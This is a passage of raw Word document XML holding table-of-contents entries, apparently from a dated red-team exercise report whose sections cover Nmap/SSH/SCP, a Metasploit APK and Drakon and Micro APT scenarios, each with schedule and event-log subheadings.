                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/10/2019 – Nmap SSH SCP</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600035 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CD5ABA5" w14:textId="0B832F05" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600036" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Schedule</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600036 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C2697CE" w14:textId="61FCBF8E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600037" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10:26 -- Multiple Performers -- Nmap SSH SCP</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600037 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F9AA2E2" w14:textId="5D7E2BFF" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600038" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.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038 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A67AB6B" w14:textId="3AAD8AF5" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600039" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.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039 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1627F054" w14:textId="698D4D7A" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600040" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600040 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="153B92CC" w14:textId="53322D67" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600041" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/13/2019 – Metasploit APK</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600041 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="297B4C24" w14:textId="0812E26C" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600042" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Schedule</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600042 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A24C51C" w14:textId="3DEA7850" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600043" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10:26 -- ClearScope -- Metasploit APK</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600043 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FAAC0AD" w14:textId="0A7B6894" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600044" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.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044 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04AE9048" w14:textId="03832406" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600045" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.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045 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37E1CF22" w14:textId="7FD74EA2" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600046" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600046 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CD40EEF" w14:textId="01352472" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600047" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/14/2019 – Linux Drakon APT and Android Micro APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600047 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
